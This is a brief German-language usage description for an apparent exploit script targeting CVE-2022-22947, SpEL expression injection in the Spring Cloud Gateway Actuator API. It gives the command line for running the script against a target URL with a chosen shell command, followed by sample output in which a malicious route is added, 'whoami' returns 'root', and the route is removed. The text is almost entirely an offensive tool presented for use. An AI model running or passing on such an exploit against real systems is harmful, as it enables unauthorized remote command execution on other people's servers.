
Spring Cloud Gateway Actuator API SpEL-Expression-Injection-Befehlsausführungs-Exploit
Spring Cloud Gateway Actuator API SpEL-Expression-Injection-Befehlsausführungs-Exploit
Nutzung:python3 CVE-2022-22947.py -u "http://127.0.0.1:8080" -c "whoami" Ergebnis: Bösartige SpEL-Expression-Route erfolgreich hinzugefügt! Routenaktualisierung erfolgreich! Angriffsergebnis erfolgreich abgerufen:
================================================ root
================================================ Bösartige Route gelöscht! Routenaktualisierung erfolgreich!